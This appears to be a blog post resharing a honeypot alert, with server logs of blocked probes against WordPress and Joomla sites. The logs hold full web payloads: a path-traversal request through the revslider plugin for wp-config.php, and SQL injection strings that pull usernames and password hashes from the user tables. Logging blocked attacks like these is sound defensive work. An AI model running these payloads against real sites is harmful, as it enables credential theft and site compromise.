Daily News

[Honeypot Alert] Active Probes for WordPress revslider_show_image Plugin Local File Inclusion Flaw – SpiderLabs Anterior

by  •  • 0 Comments

[Honeypot Alert] Active Probes for WordPress revslider_show_image Plugin Local File Inclusion Flaw – SpiderLabs Anterior.

Why there it is! Oh and go to the bottom for a real special logged event.

[403 GET / HEAD Request: September 3, 2014 – 7:27 pm]

REMOTE_ADDR: 62.236.108.73

Host Name: tor.effi.org

SERVER_PROTOCOL: HTTP/1.1

HTTP_CLIENT_IP:

HTTP_FORWARDED:

HTTP_X_FORWARDED_FOR:

HTTP_X_CLUSTER_CLIENT_IP:

REQUEST_METHOD: GET

HTTP_REFERER:

REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

QUERY_STRING:

HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

 

REMOTE_ADDR: 37.130.227.133

Host Name: torland1-this.is.a.tor.exit.server.torland.is

SERVER_PROTOCOL: HTTP/1.1

HTTP_CLIENT_IP:

HTTP_FORWARDED:

HTTP_X_FORWARDED_FOR:

HTTP_X_CLUSTER_CLIENT_IP:

REQUEST_METHOD: GET

HTTP_REFERER:

REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

QUERY_STRING:

HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

 

[403 GET / HEAD Request: September 3, 2014 – 10:25 pm]

REMOTE_ADDR: 37.130.227.133

Host Name: torland1-this.is.a.tor.exit.server.torland.is

SERVER_PROTOCOL: HTTP/1.1

HTTP_CLIENT_IP:

HTTP_FORWARDED:

HTTP_X_FORWARDED_FOR:

HTTP_X_CLUSTER_CLIENT_IP:

REQUEST_METHOD: GET

HTTP_REFERER:

REQUEST_URI: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

QUERY_STRING:

HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

 

 

Just for FUN!!

First they tried:

[403 GET / HEAD Request: September 2, 2014 – 8:15 am]
REMOTE_ADDR: 85.25.213.172
Host Name: static-ip-85-25-213-172.inaddr.ip-pool.com
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users–
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

Then they tried a little later:

[403 GET / HEAD Request: September 2, 2014 – 2:27 pm]

REMOTE_ADDR: 85.25.213.172

Host Name: static-ip-85-25-213-172.inaddr.ip-pool.com

SERVER_PROTOCOL: HTTP/1.1

HTTP_CLIENT_IP:

HTTP_FORWARDED:

HTTP_X_FORWARDED_FOR:

HTTP_X_CLUSTER_CLIENT_IP:

REQUEST_METHOD: GET

HTTP_REFERER:

REQUEST_URI: /?option=com_tag&controller=tag&task=add&article_id=-260479///!union////!select///concatusername,0x3a,password,0x3a,usertype///!from///jos_users//&tmpl=component

QUERY_STRING:

HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36

 

Leave a Reply